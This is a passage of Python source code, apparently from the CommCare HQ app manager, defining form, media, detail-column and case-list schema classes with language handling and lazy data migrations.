def add_stuff_to_xform(self, xform, build_profile_id=None):
app = self.get_app()
langs = app.get_build_langs(build_profile_id)
xform.exclude_languages(langs)
xform.set_default_language(langs[0])
xform.normalize_itext()
xform.strip_vellum_ns_attributes()
xform.set_version(self.get_version())
xform.add_missing_instances(app.domain)
def render_xform(self, build_profile_id=None):
xform = XForm(self.source)
self.add_stuff_to_xform(xform, build_profile_id)
return xform.render()
def cached_get_questions(self):
"""
Call to get_questions with a superset of necessary information, so
it can hit the same cache across common app-building workflows
"""
# it is important that this is called with the same params every time
return self.get_questions([], include_triggers=True, include_groups=True)
@time_method()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'],
timeout=24 * 60 * 60)
def get_questions(self, langs, include_triggers=False,
include_groups=False, include_translations=False):
try:
return XForm(self.source).get_questions(
langs=langs,
include_triggers=include_triggers,
include_groups=include_groups,
include_translations=include_translations,
)
except XFormException as e:
raise XFormException(_('Error in form "{}": {}')
.format(trans(self.name), six.text_type(e)))
@memoized
def get_case_property_name_formatter(self):
"""Get a function that formats case property names
The returned function requires two arguments
`(case_property_name, data_path)` and returns a string.
"""
valid_paths = {}
if toggles.MM_CASE_PROPERTIES.enabled(self.get_app().domain):
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[])}
except XFormException:
# punt on invalid xml (sorry, no rich attachments)
valid_paths = {}
def format_key(key, path):
if valid_paths.get(path) == "upload":
return "{}{}".format(ATTACHMENT_PREFIX, key)
return key
return format_key
def export_json(self, dump_json=True):
source = self.to_json()
del source['unique_id']
return json.dumps(source) if dump_json else source
def rename_lang(self, old_lang, new_lang):
    """Rename a language code in the form name and in the XForm itself."""
    _rename_key(self.name, old_lang, new_lang)
    try:
        self.rename_xform_language(old_lang, new_lang)
    except XFormException:
        # best-effort: leave the XML untouched if it cannot be processed
        pass

def rename_xform_language(self, old_code, new_code):
    """Rename a language inside the XForm XML and re-serialize the source."""
    source = XForm(self.source)
    if source.exists():
        source.rename_language(old_code, new_code)
        self.source = source.render().decode('utf-8')

def default_name(self):
    """Return the form name in the app's default language (falling back
    through the app's other languages), without a language annotation."""
    app = self.get_app()
    return trans(
        self.name,
        [app.default_language] + app.langs,
        include_lang=False
    )
@property
def full_path_name(self):
    """Human-readable 'App > Module > Form' breadcrumb for this form."""
    return "{app_name} > {module_name} > {form_name}".format(
        app_name=self.get_app().name,
        module_name=self.get_module().default_name(),
        form_name=self.default_name(),
    )
@property
def has_fixtures(self):
    # cheap substring check on the raw XML for a lookup-table reference
    return 'src="jr://fixture/item-list:' in self.source

def get_auto_gps_capture(self):
    """Whether this form should auto-capture GPS, honoring the app-level
    setting when the app has been built with the feature enabled."""
    app = self.get_app()
    if app.build_version and app.enable_auto_gps:
        return self.auto_gps_capture or app.auto_gps_capture
    else:
        return False

def is_registration_form(self, case_type=None):
    """
    Should return True if this form passes the following tests:
     * does not require a case
     * registers a case of type 'case_type' if supplied
    """
    raise NotImplementedError()

def uses_usercase(self):
    # abstract: subclasses decide based on their action schema
    raise NotImplementedError()

def update_app_case_meta(self, app_case_meta):
    # default no-op; subclasses contribute their case metadata
    pass

@property
@memoized
def case_list_modules(self):
    """Modules whose case-list form points at this form."""
    case_list_modules = [
        mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
    ]
    return case_list_modules

@property
def is_case_list_form(self):
    return bool(self.case_list_modules)
def get_save_to_case_updates(self):
    """
    Get a flat list of case property names from save to case questions
    """
    properties_by_case_type = defaultdict(set)
    for reference in self.case_references_data.get_save_references():
        properties_by_case_type[reference.case_type].update(reference.properties)
    return properties_by_case_type
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
    """A form that lives inside a module (its ``_parent``) inside an app."""

    def get_app(self):
        # module's parent is the app
        return self._parent._parent

    def get_module(self):
        return self._parent

    def get_case_type(self):
        return self._parent.case_type

    @property
    def validator(self):
        return IndexedFormBaseValidator(self)

    def _add_save_to_case_questions(self, form_questions, app_case_meta):
        # NOTE(review): form_questions is currently unused here — kept for
        # signature compatibility with callers; verify before removing.
        def _make_save_to_case_question(path):
            from corehq.apps.reports.formdetails.readable import FormQuestionResponse
            # todo: this is a hack - just make an approximate save-to-case looking question
            return FormQuestionResponse.wrap({
                "label": path,
                "tag": path,
                "value": path,
                "repeat": None,
                "group": None,
                "type": 'SaveToCase',
                "relevant": None,
                "required": None,
                "comment": None,
                "hashtagValue": path,
            })

        def _make_dummy_condition():
            # todo: eventually would be nice to support proper relevancy conditions here but that's a ways off
            return FormActionCondition(type='always')

        for property_info in self.case_references_data.get_save_references():
            if property_info.case_type:
                type_meta = app_case_meta.get_type(property_info.case_type)
                for property_name in property_info.properties:
                    app_case_meta.add_property_save(
                        property_info.case_type,
                        property_name,
                        self.unique_id,
                        _make_save_to_case_question(property_info.path),
                        None
                    )
                if property_info.create:
                    type_meta.add_opener(self.unique_id, _make_dummy_condition())
                if property_info.close:
                    type_meta.add_closer(self.unique_id, _make_dummy_condition())

    def add_property_save(self, app_case_meta, case_type, name,
                          questions, question_path, condition=None):
        """Record a case-property save on the app metadata, or an error if
        the question path does not exist in this form."""
        if question_path in questions:
            app_case_meta.add_property_save(
                case_type,
                name,
                self.unique_id,
                questions[question_path],
                condition
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )

    def add_property_load(self, app_case_meta, case_type, name,
                          questions, question_path):
        """Record a case-property load on the app metadata, or an error if
        the question path does not exist in this form."""
        if question_path in questions:
            app_case_meta.add_property_load(
                case_type,
                name,
                self.unique_id,
                questions[question_path]
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )

    def get_all_case_updates(self):
        """
        Collate contributed case updates from all sources within the form

        Subclass must have helper methods defined:

        - get_case_updates
        - get_all_contributed_subcase_properties
        - get_save_to_case_updates

        :return: collated {<case_type>: set([<property>])}
        """
        updates_by_case_type = defaultdict(set)

        for case_type, updates in self.get_case_updates().items():
            updates_by_case_type[case_type].update(updates)

        for case_type, updates in self.get_all_contributed_subcase_properties().items():
            updates_by_case_type[case_type].update(updates)

        for case_type, updates in self.get_save_to_case_updates().items():
            updates_by_case_type[case_type].update(updates)

        return updates_by_case_type

    def get_case_updates_for_case_type(self, case_type):
        """
        Like get_case_updates filtered by a single case type

        subclass must implement `get_case_updates`
        """
        return self.get_case_updates().get(case_type, [])
class JRResourceProperty(StringProperty):
    """A string property that only accepts ``jr://`` resource paths."""

    def validate(self, value, required=True):
        super(JRResourceProperty, self).validate(value, required)
        is_jr_path = value is None or value.startswith('jr://')
        if not is_jr_path:
            raise BadValueError("JR Resources must start with 'jr://': {!r}".format(value))
        return value
class CustomIcon(DocumentSchema):
    """
    A custom icon to display next to a module or a form.
    The property "form" identifies what kind of icon this would be, for ex: badge
    One can set either a simple text to display or
    an xpath expression to be evaluated for example count of cases within.
    """
    # kind of icon (e.g. "badge")
    form = StringProperty()
    # lang code => literal text to show
    text = DictProperty(six.text_type)
    # xpath expression evaluated on the phone (alternative to `text`)
    xpath = StringProperty()
class NavMenuItemMediaMixin(DocumentSchema):
    """
    Language-specific icon and audio.
    Properties are map of lang-code to filepath
    """

    # These were originally DictProperty(JRResourceProperty),
    # but jsonobject<0.9.0 didn't properly support passing in a property to a container type
    # so it was actually wrapping as a StringPropery
    # too late to retroactively apply that validation,
    # so now these are DictProperty(StringProperty)
    media_image = DictProperty(StringProperty)
    media_audio = DictProperty(StringProperty)
    custom_icons = ListProperty(CustomIcon)

    # When set to true, all languages use the specific media from the default language
    use_default_image_for_all = BooleanProperty(default=False)
    use_default_audio_for_all = BooleanProperty(default=False)

    @classmethod
    def wrap(cls, data):
        # Lazy migration from single-language media to localizable media
        for media_attr in ('media_image', 'media_audio'):
            old_media = data.get(media_attr, None)
            if old_media:
                # Single-language media was stored in a plain string.
                # Convert this to a dict, using a dummy key because we
                # don't know the app's supported or default lang yet.
                if isinstance(old_media, six.string_types):
                    soft_assert_type_text(old_media)
                    new_media = {'default': old_media}
                    data[media_attr] = new_media
                elif isinstance(old_media, dict):
                    # Once the media has localized data, discard the dummy key
                    if 'default' in old_media and len(old_media) > 1:
                        old_media.pop('default')
        return super(NavMenuItemMediaMixin, cls).wrap(data)

    def get_app(self):
        # must be provided by the concrete class mixing this in
        raise NotImplementedError

    def _get_media_by_language(self, media_attr, lang, strict=False):
        """
        Return media-path for given language if one exists, else 1st path in the
        sorted lang->media-path list

        *args:
            media_attr: one of 'media_image' or 'media_audio'
            lang: language code

        **kwargs:
            strict: whether to return None if media-path is not set for lang or
                    to return first path in sorted lang->media-path list
        """
        assert media_attr in ('media_image', 'media_audio')
        app = self.get_app()

        if ((self.use_default_image_for_all and media_attr == 'media_image')
                or (self.use_default_audio_for_all and media_attr == 'media_audio')):
            lang = app.default_language

        media_dict = getattr(self, media_attr)
        if not media_dict:
            return None
        if media_dict.get(lang, ''):
            return media_dict[lang]
        if not strict:
            # if the queried lang key doesn't exist,
            # return the first in the sorted list
            for lang, item in sorted(media_dict.items()):
                return item

    @property
    def default_media_image(self):
        # For older apps that were migrated: just return the first available item
        self._assert_unexpected_default_media_call('media_image')
        return self.icon_by_language('')

    @property
    def default_media_audio(self):
        # For older apps that were migrated: just return the first available item
        self._assert_unexpected_default_media_call('media_audio')
        return self.audio_by_language('')

    def _assert_unexpected_default_media_call(self, media_attr):
        # soft-assert (email, don't crash) when default_media_* is used on
        # an app that still only has the migration 'default' dummy key
        assert media_attr in ('media_image', 'media_audio')
        media = getattr(self, media_attr)
        if isinstance(media, dict) and list(media) == ['default']:
            from corehq.util.view_utils import get_request
            request = get_request()
            url = ''
            if request:
                url = request.META.get('HTTP_REFERER')
            _assert = soft_assert(['jschweers' + '@' + 'dimagi.com'])
            _assert(False, 'Called default_media_image on app with localized media: {}'.format(url))

    def icon_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_image', lang, strict=strict)

    def audio_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_audio', lang, strict=strict)

    def custom_icon_form_and_text_by_language(self, lang):
        """Return (form, text) of the first custom icon, localizing the text
        with a fallback to the app default language."""
        custom_icon = self.custom_icon
        if custom_icon:
            custom_icon_text = custom_icon.text.get(lang, custom_icon.text.get(self.get_app().default_language))
            return custom_icon.form, custom_icon_text
        return None, None

    def _set_media(self, media_attr, lang, media_path):
        """
        Caller's responsibility to save doc.
        Currently only called from the view which saves after all Edits
        """
        assert media_attr in ('media_image', 'media_audio')

        media_dict = getattr(self, media_attr) or {}
        old_value = media_dict.get(lang)
        media_dict[lang] = media_path or ''
        setattr(self, media_attr, media_dict)
        # remove the entry from app multimedia mappings if media is being removed now
        # This does not remove the multimedia but just it's reference in mapping
        # Added it here to ensure it's always set instead of getting it only when needed
        app = self.get_app()
        if old_value and not media_path:
            # expire all_media_paths before checking for media path used in Application
            app.all_media.reset_cache(app)
            app.all_media_paths.reset_cache(app)
            if old_value not in app.all_media_paths():
                app.multimedia_map.pop(old_value, None)

    def set_icon(self, lang, icon_path):
        self._set_media('media_image', lang, icon_path)

    def set_audio(self, lang, audio_path):
        self._set_media('media_audio', lang, audio_path)

    def _all_media_paths(self, media_attr, lang=None):
        """Set of non-empty media paths, optionally restricted to one lang."""
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        valid_media_paths = set()
        for key, value in media_dict.items():
            if value and (lang is None or key == lang):
                valid_media_paths.add(value)
        return valid_media_paths

    def all_image_paths(self, lang=None):
        return self._all_media_paths('media_image', lang=lang)

    def all_audio_paths(self, lang=None):
        return self._all_media_paths('media_audio', lang=lang)

    def icon_app_string(self, lang, for_default=False):
        """
        Return lang/app_strings.txt translation for given lang
        if a path exists for the lang

        **kwargs:
            for_default: whether app_string is for default/app_strings.txt
        """
        if not for_default and self.icon_by_language(lang, strict=True):
            return self.icon_by_language(lang, strict=True)

        if for_default:
            return self.icon_by_language(lang, strict=False)

    def audio_app_string(self, lang, for_default=False):
        """
        see note on self.icon_app_string
        """
        if not for_default and self.audio_by_language(lang, strict=True):
            return self.audio_by_language(lang, strict=True)

        if for_default:
            return self.audio_by_language(lang, strict=False)

    @property
    def custom_icon(self):
        # only one custom icon is currently supported; None if unset
        if self.custom_icons:
            return self.custom_icons[0]
class Form(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
    """A standard (basic-module) form with case management actions."""
    form_type = 'module_form'

    # xpath display condition for the form in the menu
    form_filter = StringProperty()
    requires = StringProperty(choices=["case", "referral", "none"], default="none")
    actions = SchemaProperty(FormActions)

    @classmethod
    def wrap(cls, data):
        # rare schema bug: http://manage.dimagi.com/default.asp?239236
        if data.get('case_references') == []:
            del data['case_references']
        return super(Form, cls).wrap(data)

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        super(Form, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta(self)

    def all_other_forms_require_a_case(self):
        """True if every other form in this module requires a case."""
        m = self.get_module()
        return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])

    def session_var_for_action(self, action):
        """Session variable name holding the case id created by `action`.

        Returns None for unrecognized actions.
        """
        module_case_type = self.get_module().case_type
        if action == 'open_case':
            return 'case_id_new_{}_0'.format(module_case_type)
        if isinstance(action, OpenSubCaseAction):
            subcase_type = action.case_type
            subcase_index = self.actions.subcases.index(action)
            opens_case = 'open_case' in self.active_actions()
            if opens_case:
                # the open_case action occupies index 0
                subcase_index += 1
            return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)

    def _get_active_actions(self, types):
        """Map of action-type name -> action, for the active ones among `types`."""
        actions = {}
        for action_type in types:
            getter = 'get_{}'.format(action_type)
            if hasattr(self.actions, getter):
                # use the getter if there is one
                a = list(getattr(self.actions, getter)())
            else:
                a = getattr(self.actions, action_type)
            if isinstance(a, list):
                if a:
                    actions[action_type] = a
            elif a.is_active():
                actions[action_type] = a
        return actions

    @memoized
    def get_action_type(self):
        """One of 'close' / 'open' / 'update' / 'none', by action priority."""
        if self.actions.close_case.condition.is_active():
            return 'close'
        elif (self.actions.open_case.condition.is_active() or
                self.actions.subcases):
            return 'open'
        elif self.actions.update_case.condition.is_active():
            return 'update'
        else:
            return 'none'

    @memoized
    def get_icon_help_text(self):
        """Human-readable summary of the case actions this form performs."""
        messages = []

        if self.actions.open_case.condition.is_active():
            messages.append(_('This form opens a {}').format(self.get_module().case_type))

        if self.actions.subcases:
            messages.append(_('This form opens a subcase {}').format(', '.join(self.get_subcase_types())))

        if self.actions.close_case.condition.is_active():
            messages.append(_('This form closes a {}').format(self.get_module().case_type))

        elif self.requires_case():
            messages.append(_('This form updates a {}').format(self.get_module().case_type))

        return '. '.join(messages)

    def active_actions(self):
        """Active actions relevant to this form, filtered by `self.requires`."""
        self.get_app().assert_app_v2()
        if self.requires == 'none':
            action_types = (
                'open_case', 'update_case', 'close_case', 'subcases',
                'usercase_update', 'usercase_preload',
            )
        elif self.requires == 'case':
            action_types = (
                'update_case', 'close_case', 'case_preload', 'subcases',
                'usercase_update', 'usercase_preload', 'load_from_form',
            )
        else:
            # this is left around for legacy migrated apps
            action_types = (
                'open_case', 'update_case', 'close_case',
                'case_preload', 'subcases',
                'usercase_update', 'usercase_preload',
            )
        return self._get_active_actions(action_types)

    def active_non_preloader_actions(self):
        return self._get_active_actions((
            'open_case', 'update_case', 'close_case',
            'open_referral', 'update_referral', 'close_referral'))

    @property
    def validator(self):
        return FormValidator(self)

    def requires_case(self):
        # all referrals also require cases
        return self.requires in ("case", "referral")

    def requires_case_type(self):
        return self.requires_case() or \
            bool(self.active_non_preloader_actions())

    def requires_referral(self):
        return self.requires == "referral"

    def uses_parent_case(self):
        """
        Returns True if any of the load/update properties references the
        parent case; False otherwise
        """
        return any([name.startswith('parent/')
                    for name in self.actions.all_property_names()])

    def get_registration_actions(self, case_type):
        """
        :return: List of actions that create a case. Subcase actions are included
                 as long as they are not inside a repeat. If case_type is not None
                 only return actions that create a case of the specified type.
        """
        reg_actions = []
        if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
            reg_actions.append('open_case')

        subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
        if case_type:
            subcase_actions = [a for a in subcase_actions if a.case_type == case_type]

        reg_actions.extend(subcase_actions)
        return reg_actions

    def is_registration_form(self, case_type=None):
        reg_actions = self.get_registration_actions(case_type)
        return len(reg_actions) == 1

    def uses_usercase(self):
        return actions_use_usercase(self.active_actions())

    def get_case_updates(self):
        # This method is used by both get_all_case_properties and
        # get_usercase_properties. In the case of usercase properties, use
        # the usercase_update action, and for normal cases, use the
        # update_case action
        case_type = self.get_module().case_type
        format_key = self.get_case_property_name_formatter()

        return {
            case_type: {
                format_key(*item) for item in self.actions.update_case.update.items()},
            USERCASE_TYPE: {
                format_key(*item) for item in self.actions.usercase_update.update.items()}
        }

    @memoized
    def get_subcase_types(self):
        '''
        Return a list of each case type for which this Form opens a new subcase.
        :return:
        '''
        return {subcase.case_type for subcase in self.actions.subcases
                if subcase.close_condition.type == "never" and subcase.case_type}

    @property
    def case_references(self):
        refs = self.case_references_data or CaseReferences()
        if not refs.load and self.actions.load_from_form.preload:
            # for backward compatibility
            # preload only has one reference per question path
            preload = self.actions.load_from_form.preload
            refs.load = {key: [value] for key, value in six.iteritems(preload)}
        return refs

    @case_references.setter
    def case_references(self, refs):
        """Set case references

        format: {"load": {"/data/path": ["case_property", ...], ...}}
        """
        self.case_references_data = refs
        if self.actions.load_from_form.preload:
            # clear the legacy preload action once references are set directly
            self.actions.load_from_form = PreloadAction()

    @memoized
    def get_all_contributed_subcase_properties(self):
        case_properties = defaultdict(set)
        for subcase in self.actions.subcases:
            case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
        return case_properties

    @memoized
    def get_contributed_case_relationships(self):
        """Map child case type -> {(parent_type, relationship_id), ...}."""
        case_relationships_by_child_type = defaultdict(set)
        parent_case_type = self.get_module().case_type
        for subcase in self.actions.subcases:
            child_case_type = subcase.case_type
            if child_case_type != parent_case_type and (
                    self.actions.open_case.is_active() or
                    self.actions.update_case.is_active() or
                    self.actions.close_case.is_active()):
                case_relationships_by_child_type[child_case_type].add(
                    (parent_case_type, subcase.reference_id or 'parent'))
        return case_relationships_by_child_type

    def update_app_case_meta(self, app_case_meta):
        """Contribute this form's case opens/closes/saves/loads to the
        app-wide case metadata object."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_triggers=True,
                                        include_groups=True, include_translations=True)
        }
        self._add_save_to_case_questions(questions, app_case_meta)
        module_case_type = self.get_module().case_type
        type_meta = app_case_meta.get_type(module_case_type)
        for type_, action in self.active_actions().items():
            if type_ == 'open_case':
                type_meta.add_opener(self.unique_id, action.condition)
                self.add_property_save(
                    app_case_meta,
                    module_case_type,
                    'name',
                    questions,
                    action.name_path
                )
            if type_ == 'close_case':
                type_meta.add_closer(self.unique_id, action.condition)
            if type_ == 'update_case' or type_ == 'usercase_update':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_save(
                        app_case_meta,
                        USERCASE_TYPE if type_ == 'usercase_update' else module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'case_preload' or type_ == 'load_from_form' or type_ == 'usercase_preload':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_load(
                        app_case_meta,
                        USERCASE_TYPE if type_ == 'usercase_preload' else module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'subcases':
                for act in action:
                    if act.is_active():
                        sub_type_meta = app_case_meta.get_type(act.case_type)
                        sub_type_meta.add_opener(self.unique_id, act.condition)
                        if act.close_condition.is_active():
                            sub_type_meta.add_closer(self.unique_id, act.close_condition)
                        for name, question_path in FormAction.get_action_properties(act):
                            self.add_property_save(
                                app_case_meta,
                                act.case_type,
                                name,
                                questions,
                                question_path
                            )

        # `types` default binds module_case_type at definition time; the
        # function is re-defined per call so the default is not shared state
        def parse_case_type(name, types={"#case": module_case_type,
                                         "#user": USERCASE_TYPE}):
            if name.startswith("#") and "/" in name:
                full_name = name
                hashtag, name = name.split("/", 1)
                if hashtag not in types:
                    hashtag, name = "#case", full_name
            else:
                hashtag = "#case"
            return types[hashtag], name

        def parse_relationship(name):
            if '/' not in name:
                return name

            relationship, property_name = name.split('/', 1)
            if relationship == 'grandparent':
                relationship = 'parent/parent'
            return '/'.join([relationship, property_name])

        for case_load_reference in self.case_references.get_load_references():
            for name in case_load_reference.properties:
                case_type, name = parse_case_type(name)
                name = parse_relationship(name)
                self.add_property_load(
                    app_case_meta,
                    case_type,
                    name,
                    questions,
                    case_load_reference.path
                )
class MappingItem(DocumentSchema):
    """One key -> localized-display mapping entry (used e.g. by enum columns)."""
    key = StringProperty()
    # lang => localized string
    value = DictProperty()

    @property
    def treat_as_expression(self):
        """
        Returns if whether the key can be treated as a valid expression that can be included in
        condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
        """
        special_chars = '{}()[]=<>."\'/'
        return any(special_char in self.key for special_char in special_chars)

    @property
    def key_as_variable(self):
        """
        Return an xml variable name to represent this key.

        If the key contains spaces or a condition-predicate of an if-clause,
        return a hash of the key with "h" prepended.
        If not, return the key with "k" prepended.

        The prepended characters prevent the variable name from starting with a
        numeral, which is illegal.
        """
        if re.search(r'\W', self.key) or self.treat_as_expression:
            return 'h{hash}'.format(hash=hashlib.md5(self.key.encode('UTF-8')).hexdigest()[:8])
        else:
            return 'k{key}'.format(key=self.key)

    def key_as_condition(self, property):
        """Return an xpath condition matching this key against `property`."""
        if self.treat_as_expression:
            condition = dot_interpolate(self.key, property)
            return "{condition}".format(condition=condition)
        else:
            return "{property} = '{key}'".format(
                property=property,
                key=self.key
            )

    def ref_to_key_variable(self, index, sort_or_display):
        """Reference to this key for a "sort" (by index) or "display" (by
        variable name) context.

        :raises ValueError: for any other `sort_or_display` value.
        """
        if sort_or_display == "sort":
            return "{}, ".format(index)
        elif sort_or_display == "display":
            return "${var_name}, ".format(var_name=self.key_as_variable)
        # Previously an unexpected value fell through and raised an opaque
        # NameError on the unbound local; fail explicitly instead.
        raise ValueError(
            "sort_or_display must be 'sort' or 'display', got {!r}".format(sort_or_display))
class GraphAnnotations(IndexedSchema):
    """A text annotation pinned at an (x, y) position on a graph."""
    # lang => annotation text
    display_text = DictProperty()
    x = StringProperty()
    y = StringProperty()


class GraphSeries(DocumentSchema):
    """One data series of a graph: where the data comes from and how each
    point's coordinates are computed."""
    config = DictProperty()
    locale_specific_config = DictProperty()
    data_path = StringProperty()
    x_function = StringProperty()
    y_function = StringProperty()
    radius_function = StringProperty()


class GraphConfiguration(DocumentSchema):
    """Full configuration for a graph detail column."""
    config = DictProperty()
    locale_specific_config = DictProperty()
    annotations = SchemaListProperty(GraphAnnotations)
    graph_type = StringProperty()
    series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
    """
    Represents a tab in the case detail screen on the phone.
    Each tab is itself a detail, nested inside the app's "main" detail.
    """
    # lang => tab header text
    header = DictProperty()

    # The first index, of all fields in the parent detail, that belongs to this tab
    starting_index = IntegerProperty()

    # A tab may be associated with a nodeset, resulting in a detail that
    # iterates through sub-nodes of an entity rather than a single entity
    has_nodeset = BooleanProperty(default=False)
    nodeset = StringProperty()
    relevant = StringProperty()
class DetailColumn(IndexedSchema):
    """
    Represents a column in case selection screen on the phone. Ex:
        {
            'header': {'en': 'Sex', 'por': 'Sexo'},
            'model': 'case',
            'field': 'sex',
            'format': 'enum',
            'xpath': '.',
            'enum': [
                {'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
                {'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
            ],
        }

    """
    header = DictProperty()
    model = StringProperty()
    field = StringProperty()
    useXpathExpression = BooleanProperty(default=False)
    format = StringProperty()

    enum = SchemaListProperty(MappingItem)
    graph_configuration = SchemaProperty(GraphConfiguration)
    case_tile_field = StringProperty()

    late_flag = IntegerProperty(default=30)
    advanced = StringProperty(default="")
    filter_xpath = StringProperty(default="")
    time_ago_interval = FloatProperty(default=365.25)

    @property
    def enum_dict(self):
        """for backwards compatibility with building 1.0 apps"""
        import warnings
        warnings.warn('You should not use enum_dict. Use enum instead',
                      DeprecationWarning)
        return dict((item.key, item.value) for item in self.enum)

    def rename_lang(self, old_lang, new_lang):
        # rename in the header and in every enum item's localized values
        for dct in [self.header] + [item.value for item in self.enum]:
            _rename_key(dct, old_lang, new_lang)

    @property
    def field_type(self):
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[0]
        else:
            return 'property'  # equivalent to property:parent/case_property

    @property
    def field_property(self):
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[1]
        else:
            return self.field

    # days-per-unit used to convert old *-ago formats into `time_ago_interval`
    class TimeAgoInterval(object):
        map = {
            'day': 1.0,
            'week': 7.0,
            'month': 30.4375,
            'year': 365.25
        }

        @classmethod
        def get_from_old_format(cls, format):
            if format == 'years-ago':
                return cls.map['year']
            elif format == 'months-ago':
                return cls.map['month']

    @classmethod
    def wrap(cls, data):
        # Lazy migration: convert old months-ago/years-ago formats to time-ago
        if data.get('format') in ('months-ago', 'years-ago'):
            data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
            data['format'] = 'time-ago'

        # Lazy migration: enum used to be a dict, now is a list
        if isinstance(data.get('enum'), dict):
            data['enum'] = sorted(
                [{'key': key, 'value': value} for key, value in data['enum'].items()],
                key=lambda d: d['key'],
            )

        # Lazy migration: xpath expressions from format to first-class property
        if data.get('format') == 'calculate':
            property_xpath = PropertyXpathGenerator(None, None, None, super(DetailColumn, cls).wrap(data)).xpath
            data['field'] = dot_interpolate(data.get('calc_xpath', '.'), property_xpath)
            data['useXpathExpression'] = True
            data['hasAutocomplete'] = False
            data['format'] = 'plain'

        return super(DetailColumn, cls).wrap(data)

    @classmethod
    def from_json(cls, data):
        from corehq.apps.app_manager.views.media_utils import interpolate_media_path

        to_ret = cls.wrap(data)
        if to_ret.format == 'enum-image':
            # interpolate icons-paths
            for item in to_ret.enum:
                for lang, path in six.iteritems(item.value):
                    item.value[lang] = interpolate_media_path(path)
        return to_ret

    @property
    def invisible(self):
        return self.format == 'invisible'
class SortElement(IndexedSchema):
    """A sort rule for a case-list detail."""
    field = StringProperty()
    type = StringProperty()
    direction = StringProperty()
    blanks = StringProperty()
    # lang => display text for the sort field
    display = DictProperty()
    sort_calculation = StringProperty(default="")

    def has_display_values(self):
        # any non-blank localized display text
        return any(s.strip() != '' for s in self.display.values())
class CaseListLookupMixin(DocumentSchema):
    """
    Allows for the addition of Android Callouts to do lookups from the CaseList

        <lookup action="" image="" name="">
            <extra key="" value="" />
            <response key="" />
            <field>
                <header><text><locale id=""/></text></header>
                <template><text><xpath function=""/></text></template>
            </field>
        </lookup>

    """
    lookup_enabled = BooleanProperty(default=False)
    lookup_autolaunch = BooleanProperty(default=False)
    lookup_action = StringProperty()
    lookup_name = StringProperty()
    lookup_image = JRResourceProperty(required=False)

    # key/value extras passed to the callout intent
    lookup_extras = SchemaListProperty()
    lookup_responses = SchemaListProperty()

    lookup_display_results = BooleanProperty(default=False)  # Display callout results in case list?
    # lang => header for the result field
    lookup_field_header = DictProperty()
    lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
    """
    Full configuration for a case selection screen

    """
    display = StringProperty(choices=['short', 'long'])

    columns = SchemaListProperty(DetailColumn)
    get_columns = IndexedSchema.Getter('columns')

    tabs = SchemaListProperty(DetailTab)
    get_tabs = IndexedSchema.Getter('tabs')

    sort_elements = SchemaListProperty(SortElement)
    sort_nodeset_columns = BooleanProperty()
    filter = StringProperty()

    # If True, a small tile will display the case name after selection.
    persist_case_context = BooleanProperty()
    persistent_case_context_xml = StringProperty(default='case_name')

    # Custom variables to add into the <variables /> node
    custom_variables = StringProperty()

    # If True, use case tiles in the case list
    use_case_tiles = BooleanProperty()
    # If given, use this string for the case tile markup instead of the default temaplte
    custom_xml = StringProperty()

    persist_tile_on_forms = BooleanProperty()
    # use case tile context persisted over forms from another module
    persistent_case_tile_from_module = StringProperty()
    # If True, the in form tile can be pulled down to reveal all the case details.
    pull_down_tile = BooleanProperty()

    print_template = DictProperty()

    def get_tab_spans(self):
        '''
        Return the starting and ending indices into self.columns deliminating
        the columns that should be in each tab.
        :return:
        '''
        tabs = list(self.get_tabs())
        ret = []
        for tab in tabs:
            try:
                # each tab ends where the next one starts
                end = tabs[tab.id + 1].starting_index
            except IndexError:
                # the last tab runs to the end of the column list
                end = len(self.columns)
            ret.append((tab.starting_index, end))
        return ret

    @parse_int([1])
    def get_column(self, i):
        return self.columns[i].with_id(i % len(self.columns), self)

    def rename_lang(self, old_lang, new_lang):
        for column in self.columns:
            column.rename_lang(old_lang, new_lang)

    def sort_nodeset_columns_for_detail(self):
        """Whether nodeset-column sorting applies: only for the long detail
        when enabled and at least one tab has a nodeset."""
        return (
            self.display == "long" and
            self.sort_nodeset_columns and
            any(tab for tab in self.get_tabs() if tab.has_nodeset)
        )
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
    """Configuration for the 'view all cases' menu item of a module."""

    # lang => menu label
    label = DictProperty()
    show = BooleanProperty(default=False)

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)

    def get_app(self):
        # `_module` back-reference is assigned by ModuleBase.assign_references
        return self._module.get_app()
class CaseSearchProperty(DocumentSchema):
    """
    Case properties available to search on.
    """
    name = StringProperty()
    # lang => label text
    label = DictProperty()


